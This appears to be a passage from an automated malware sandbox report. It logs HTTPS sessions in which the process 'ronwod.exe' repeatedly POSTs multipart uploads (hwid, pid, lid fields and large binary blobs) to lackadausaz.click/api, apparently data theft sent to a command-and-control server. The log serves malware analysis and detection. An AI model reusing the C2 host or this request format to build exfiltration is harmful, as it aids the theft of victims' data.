2024-12-28 07:17:38 UTC	1369	IN	Data Raw: 61 47 30 44 35 52 32 62 62 4b 47 42 36 66 47 54 5a 37 35 4c 51 36 72 34 56 47 33 70 30 63 58 57 41 75 6a 73 39 2b 6e 5a 61 4d 38 72 66 78 48 69 65 2f 55 59 2b 64 4f 38 70 63 30 69 73 45 64 31 36 65 55 59 4f 62 79 4a 75 2f 70 58 73 36 4b 2b 37 64 31 72 69 57 59 70 48 65 55 64 38 6e 37 72 33 72 33 71 69 33 6d 77 46 6c 54 68 2b 42 4e 31 68 4e 48 46 33 41 4c 6f 37 49 58 70 78 58 54 4f 50 6e 68 66 67 30 62 4d 4f 50 6e 61 72 62 65 44 65 2b 45 44 47 72 4b 38 57 6e 57 2f 6a 73 57 63 45 75 4c 33 35 62 6d 63 4b 70 73 33 4a 77 76 6c 55 34 74 6d 71 5a 72 36 74 49 4e 74 34 55 4a 55 35 2b 38 58 4f 37 69 4e 6c 38 4a 42 70 71 2f 33 31 50 56 66 78 43 56 73 48 4b 4a 37 39 52 2f 77 78 4c 65 70 78 41 75 66 4d 6b 76 74 2f 6c 59 54 75 49 6d 47 68 41 7a 77 74 50 43 79 69 31 76 Data Ascii: aG0D5R2bbKGB6fGTZ75LQ6r4VG3p0cXWAujs9+nZaM8rfxHie/UY+dO8pc0isEd16eUYObyJu/pXs6K+7d1riWYpHeUd8n7r3r3qi3mwFlTh+BN1hNHF3ALo7IXpxXTOPnhfg0bMOPnarbeDe+EDGrK8WnW/jsWcEuL35bmcKps3JwvlU4tmqZr6tINt4UJU5+8XO7iNl8JBpq/31PVfxCVsHKJ79R/wxLepxAufMkvt/lYTuImGhAzwtPCyi1v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	104.21.92.219	443	7544	C:\Users\user\Desktop\ronwod.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 07:17:40 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HCM4U2A9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18104 Host: lackadausaz.click
2024-12-28 07:17:40 UTC	15331	OUT	Data Raw: 2d 2d 48 43 4d 34 55 32 41 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 33 34 30 37 44 43 33 38 35 38 31 32 35 43 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 48 43 4d 34 55 32 41 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 43 4d 34 55 32 41 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 49 52 69 61 46 69 2d 2d 32 36 64 65 6b 31 0d 0a 2d 2d 48 43 4d 34 55 32 41 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 Data Ascii: --HCM4U2A9Content-Disposition: form-data; name="hwid"D03407DC3858125CBCFD68B774EF9B7A--HCM4U2A9Content-Disposition: form-data; name="pid"2--HCM4U2A9Content-Disposition: form-data; name="lid"IRiaFi--26dek1--HCM4U2A9Content-Disposi
2024-12-28 07:17:40 UTC	2773	OUT	Data Raw: 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b 91 d7 e9 Data Ascii: f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{
2024-12-28 07:17:41 UTC	1140	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 07:17:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mnmonoleokmv64anfgiu841l0c; expires=Wed, 23 Apr 2025 01:04:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lKcIT7%2Bh5z1p82FiQMN8lrSjlLcCZOFim%2Bz3YWD%2BfMr0kXYdbnefYYOVS7WS3Bq5zHaEvz2%2FyXvR%2BGMawc3DyhWYSHh8i1a4a8NsyPxAoEQ%2FgOcgChAGVzONe0u10KNPXSzo9Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8fc5a2efd18c99-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1951&min_rtt=1941&rtt_var=749&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19057&delivery_rate=1441975&cwnd=247&unsent_bytes=0&cid=6ce46d98064fa8aa&ts=1023&x=0"
2024-12-28 07:17:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 07:17:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	104.21.92.219	443	7544	C:\Users\user\Desktop\ronwod.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 07:17:43 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=YL3799S95WVHVMF2D User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8779 Host: lackadausaz.click
2024-12-28 07:17:43 UTC	8779	OUT	Data Raw: 2d 2d 59 4c 33 37 39 39 53 39 35 57 56 48 56 4d 46 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 33 34 30 37 44 43 33 38 35 38 31 32 35 43 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 59 4c 33 37 39 39 53 39 35 57 56 48 56 4d 46 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 4c 33 37 39 39 53 39 35 57 56 48 56 4d 46 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 49 52 69 61 46 69 2d 2d 32 36 64 65 6b 31 0d 0a Data Ascii: --YL3799S95WVHVMF2DContent-Disposition: form-data; name="hwid"D03407DC3858125CBCFD68B774EF9B7A--YL3799S95WVHVMF2DContent-Disposition: form-data; name="pid"2--YL3799S95WVHVMF2DContent-Disposition: form-data; name="lid"IRiaFi--26dek1
2024-12-28 07:17:44 UTC	1137	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 07:17:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rjh5u8ad8njad4ajohoqm0g5kp; expires=Wed, 23 Apr 2025 01:04:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9t8UJdOqZrUi7Mj3B%2BYBz7Wvy5AY%2Fxr4JSJu5BjfHHwGpDMnu%2BBetsB6iAJ1j8%2B5QYN3oDezIiIhnIC%2FagKUHaDzqKoThWI%2BuWgKSySQZ2LBph5KhUkF09d7PNbO9pB1ZHjfJw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8fc5b39fa77c7b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1939&min_rtt=1932&rtt_var=730&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9718&delivery_rate=1511387&cwnd=207&unsent_bytes=0&cid=fec1150ecb11593f&ts=883&x=0"
2024-12-28 07:17:44 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 07:17:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	104.21.92.219	443	7544	C:\Users\user\Desktop\ronwod.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 07:17:45 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=765ACRZ7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20378 Host: lackadausaz.click
2024-12-28 07:17:45 UTC	15331	OUT	Data Raw: 2d 2d 37 36 35 41 43 52 5a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 33 34 30 37 44 43 33 38 35 38 31 32 35 43 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 37 36 35 41 43 52 5a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 37 36 35 41 43 52 5a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 49 52 69 61 46 69 2d 2d 32 36 64 65 6b 31 0d 0a 2d 2d 37 36 35 41 43 52 5a 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 Data Ascii: --765ACRZ7Content-Disposition: form-data; name="hwid"D03407DC3858125CBCFD68B774EF9B7A--765ACRZ7Content-Disposition: form-data; name="pid"3--765ACRZ7Content-Disposition: form-data; name="lid"IRiaFi--26dek1--765ACRZ7Content-Disposi
2024-12-28 07:17:45 UTC	5047	OUT	Data Raw: 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7 cc 07 00 Data Ascii: QMn 64F6(X&7~`aO@dR<x)
2024-12-28 07:17:46 UTC	1140	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 07:17:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hllhofuodm9s5qov105ts8t6hl; expires=Wed, 23 Apr 2025 01:04:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8gnjTA4U0inikLO%2FlOrAxiQ%2B%2FOSJ7Cs8rZioIVpAi%2FqvPZKqeWVL9liCJx67y5luAZoI34cDmAVInzzFvF3X6EvS22mb9GjrDA9ad%2FnZq2m72Ivl3GxK2iVY0fdPP4wamy%2BCOw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8fc5c23aff4210-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1668&rtt_var=685&sent=15&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21331&delivery_rate=1750599&cwnd=244&unsent_bytes=0&cid=852b970c8fe90fe6&ts=1092&x=0"
2024-12-28 07:17:46 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 07:17:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	104.21.92.219	443	7544	C:\Users\user\Desktop\ronwod.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 07:17:48 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=BQZNCO6AGO28Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1226 Host: lackadausaz.click
2024-12-28 07:17:48 UTC	1226	OUT	Data Raw: 2d 2d 42 51 5a 4e 43 4f 36 41 47 4f 32 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 33 34 30 37 44 43 33 38 35 38 31 32 35 43 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 42 51 5a 4e 43 4f 36 41 47 4f 32 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 51 5a 4e 43 4f 36 41 47 4f 32 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 49 52 69 61 46 69 2d 2d 32 36 64 65 6b 31 0d 0a 2d 2d 42 51 5a 4e 43 4f 36 41 47 4f Data Ascii: --BQZNCO6AGO28QContent-Disposition: form-data; name="hwid"D03407DC3858125CBCFD68B774EF9B7A--BQZNCO6AGO28QContent-Disposition: form-data; name="pid"1--BQZNCO6AGO28QContent-Disposition: form-data; name="lid"IRiaFi--26dek1--BQZNCO6AGO
2024-12-28 07:17:49 UTC	1132	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 07:17:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=93b80vouhb4nfkmuj3ck8i08j8; expires=Wed, 23 Apr 2025 01:04:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PgnVUrblw72ofeVkwpNgHmsbvYLep%2BaJk%2FVknW1CuIlaHzEMtDdMs4bGpVCPTTzEtz51UnOWXM18mn8UzwEDrLgrxlVkpsgfnXAh8jN%2FHkL95o4M4WVxU2%2Bkj6Cm5hb6YJEyBQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8fc5d36b08c470-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1489&rtt_var=571&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2139&delivery_rate=1897335&cwnd=236&unsent_bytes=0&cid=7b5da3bb3ba94911&ts=668&x=0"
2024-12-28 07:17:49 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 07:17:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	104.21.92.219	443	7544	C:\Users\user\Desktop\ronwod.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 07:17:50 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=B3LFISRH0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 572520 Host: lackadausaz.click
2024-12-28 07:17:50 UTC	15331	OUT	Data Raw: 2d 2d 42 33 4c 46 49 53 52 48 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 33 34 30 37 44 43 33 38 35 38 31 32 35 43 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 42 33 4c 46 49 53 52 48 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 33 4c 46 49 53 52 48 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 49 52 69 61 46 69 2d 2d 32 36 64 65 6b 31 0d 0a 2d 2d 42 33 4c 46 49 53 52 48 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 Data Ascii: --B3LFISRH0Content-Disposition: form-data; name="hwid"D03407DC3858125CBCFD68B774EF9B7A--B3LFISRH0Content-Disposition: form-data; name="pid"1--B3LFISRH0Content-Disposition: form-data; name="lid"IRiaFi--26dek1--B3LFISRH0Content-Dis
2024-12-28 07:17:50 UTC	15331	OUT	Data Raw: 5e e8 8f 30 49 c5 c6 86 da e8 7c cf ac dd 0e 70 88 dd b8 fa 3c 4d 32 8c a6 70 76 f4 e6 ba b9 18 fa 92 b5 75 2c 48 90 47 1d a5 f5 66 b0 6f 3f d5 00 ed da c0 1f 35 76 52 86 e5 2b 0c a6 79 df 7c 42 fd 78 bd 86 8a a0 13 bb 0e 5d 81 3b f9 b6 e4 ea e1 b4 e3 42 eb d7 48 e8 5e 5d 78 7b d3 44 12 bd 80 5d ef c9 e3 fe 4c 3e c6 48 10 03 73 c5 2c a7 0f 48 58 ac 35 02 0a c2 02 5d 85 43 26 d5 d4 53 b4 6b ca 9b 6d fa 00 eb c3 47 9b b7 47 27 a5 42 2f de 99 7e 66 f7 66 24 83 6f a8 dc c9 f5 ff 2e 7c 4c 7d e7 d7 31 7b 46 f6 0c 48 4e d9 1e bc 21 88 c0 44 c2 d8 16 a3 e0 0e 78 6c 5c 65 ce 5e db cd 17 32 b1 fc a4 0c c0 ee 3d 7c 6b c2 29 4b 26 b6 a0 59 4b 10 94 77 30 de 08 af a2 81 5f ce 51 d8 63 27 44 95 e8 95 40 44 1d 8a 3d 03 e6 4a 84 ad ef 53 b7 b8 ff f9 9e e0 d7 de d6 ca 55 Data Ascii: ^0I\|p<M2pvu,HGfo?5vR+y\|Bx];BH^]x{D]L>Hs,HX5]C&SkmGG'B/~ff$o.\|L}1{FHN!Dxl\e^2=\|k)K&YKw0_Qc'D@D=JSU
2024-12-28 07:17:50 UTC	15331	OUT	Data Raw: 0b 9f a6 93 da ca 0d 86 17 7e 05 77 6d af 6e 5a 75 86 93 b8 35 da 84 63 67 72 eb 0f b1 fa 50 e0 00 de 6d 96 39 bb 03 44 f1 d6 72 e3 a6 97 2d 1c fe a9 a1 10 80 ba 17 73 81 2b 09 58 5c 23 c0 60 1f f8 bd 6f fc 85 8b bf f3 01 e6 b5 df ff d7 8e fc 75 44 e2 8b 20 81 41 27 9a f1 50 9c 7e 01 78 22 b9 e9 88 68 3f 0a f8 bd 0b 03 8c db 76 70 a6 30 f8 76 b3 02 d1 76 90 13 23 af c7 ed 37 bf e5 4e 99 0a b6 ab 4f 60 1e 40 26 71 9b 36 2c 67 88 7c 9f 7a 01 c0 96 42 e0 c0 96 dc 91 05 0a c2 27 76 c4 6b 6d 89 81 92 5b 82 7c 98 0b 53 da 80 8a b3 dc fb 15 69 ff 3d 0a fd b7 86 ff bc 7f 5c 15 73 a1 1f 97 6e da 9e b5 73 a5 ee a1 ab 0f 6f 29 d0 de fb ab 89 71 1c 66 39 f4 1e c3 30 95 9d f5 d0 a1 65 a3 f0 2c 0d 98 e4 ec 0e 56 17 fe 8d f8 61 0b 25 52 3a b9 d5 ab db 1b 45 4d e5 97 ce Data Ascii: ~wmnZu5cgrPm9Dr-s+X\#`ouD A'P~x"h?vp0vv#7NO`@&q6,g\|zB'vkm[\|Si=\snso)qf90e,Va%R:EM
2024-12-28 07:17:50 UTC	15331	OUT	Data Raw: f0 60 14 26 18 22 bf 14 71 ba 94 9b ab 27 9e 4e 0c bf fb 57 7d 23 67 80 6e ee ee b2 e9 fd 5e 49 76 a5 67 7c bd 65 e3 6e 83 c6 0d 8e 80 d9 6b 46 f0 41 bd a1 b9 96 d3 28 a7 e4 ce 6a 2f bf 37 c9 3c ea 12 c3 ef 57 74 55 ba 3e c4 89 08 0e 89 86 38 ef 4f 5e 08 b9 53 20 a8 04 42 1a a8 35 77 65 74 83 bd 3b b5 2b 57 1f df 98 b3 66 5f 33 6b 36 18 cd c5 4f e1 76 4b 47 c3 96 17 c3 2a 51 66 54 aa 91 17 db 28 92 bc c1 05 93 68 0e 7a fe 64 94 f9 2d f9 1f 5f 7d bc b8 1b 68 2f 79 c4 da c2 77 56 24 9b 12 11 76 96 79 08 86 fe c2 d3 5d f3 2a ed e1 dd f1 c7 97 29 06 f8 51 21 2f 15 f2 ed e1 40 6d c1 65 29 ca 67 90 ae ba 4c e8 53 25 a4 34 33 36 11 fd 6f bc 52 12 c9 01 73 bf b7 62 c9 8f 08 6a b7 31 6b 2a 75 a4 a3 df 90 13 b8 41 44 49 5a da a5 52 93 d1 aa c1 0b 01 ce bc 88 92 16 Data Ascii: `&"q'NW}#gn^Ivg\|enkFA(j/7<WtU>8O^S B5wet;+Wf_3k6OvKGQfT(hzd-_}h/ywV$vy])Q!/@me)gLS%436oRsbj1k*uADIZR
2024-12-28 07:17:50 UTC	15331	OUT	Data Raw: a2 f0 e3 bc 02 cc e8 50 f1 e8 96 38 32 59 77 c9 cb 60 3a 49 e3 6c b9 f8 03 ce c7 be 47 05 6b 60 18 aa bd d2 33 1f bb f4 1d f7 90 bb 17 bb 67 f7 bf e3 d0 54 30 6f b2 03 13 0b 98 f1 d0 c4 f9 c6 72 02 1c de d9 da dc 2b 7b 9a 32 39 42 5b bd 70 ac 1f 5b 54 5b 7a e8 1e e5 e8 65 fb f4 0f bc 91 1c b8 f6 c2 de a7 78 8b 03 9e e5 d6 ab ec 62 b3 00 f6 ef c1 47 1d 82 dc d2 2e 19 df b9 b1 09 3d 70 3d b7 51 45 bb f8 af 57 87 9d 9f b6 b4 cb 6a b1 0f ff 88 6e aa 33 8c d7 ef 1e 6e 8c f0 fa 95 1c da 8c 79 56 41 f8 d6 ee 4e b7 63 fb 3d 6a 53 55 85 ed d7 df 5b bb fd 5a cb 13 9f 3f f1 40 71 2e bc a4 f2 26 ff c3 77 a4 fa 97 b2 56 da d9 22 8f 9d 21 64 54 5f ab b9 d8 05 93 cd 1e 58 dc a4 19 b9 96 50 f2 24 28 dd 87 64 67 2f 68 50 2a 6d de b5 2e bc ec 52 ff f8 d5 2b 47 62 17 82 eb Data Ascii: P82Yw`:IlGk`3gT0or+{29B[p[T[zexbG.=p=QEWjn3nyVANc=jSU[Z?@q.&wV"!dT_XP$(dg/hP*m.R+Gb
2024-12-28 07:17:50 UTC	15331	OUT	Data Raw: 8f 4b 00 04 ee ef 4b 6c 29 dd 97 88 01 61 bb 71 b0 28 9a 7b 49 14 9d ca 07 f2 e6 25 69 b5 70 8b c1 01 6f 68 e5 38 6a 5f 3f 60 0d 9f 03 6e cc b4 08 ba 06 eb 63 5a 9e f5 90 d3 23 b0 30 35 bf 8a 03 b1 08 c8 fb 2f 4d b9 78 98 ba bf 28 84 be cf d0 a6 f1 d0 57 1a ed a9 9a 57 f0 49 f3 8d eb 6f 1e ca 2d fc 83 87 94 fb 6c 91 4a 1d 06 bc 5a 17 3c 93 80 d7 1e f9 ff 03 0a 73 11 3e 57 3e 89 03 a5 7e 90 3f 11 bc 53 f5 ea 06 79 59 87 b6 61 70 86 b7 01 1a 75 e2 92 0f d8 89 06 a8 df 67 80 db 59 58 03 9c c4 a7 99 95 94 9d 09 cd f0 29 71 da 3f ad d9 22 13 53 be e8 93 ea 56 55 b6 9c 9a 43 31 92 2a 44 eb 1e 9d b1 7b 30 8e 29 d8 00 61 23 69 21 fb 77 45 05 eb 59 ea 65 55 eb 9b 1d 0a 38 88 85 e1 b0 e2 68 af 16 57 60 72 27 87 e2 c7 fb b9 8f 24 d5 fe e0 96 53 0a 5f 8c 9a 6a f5 94 Data Ascii: KKl)aq({I%ipoh8j_?`ncZ#05/Mx(WWIo-lJZ<s>W>~?SyYapugYX)q?"SVUC1*D{0)a#i!wEYeU8hW`r'$S_j
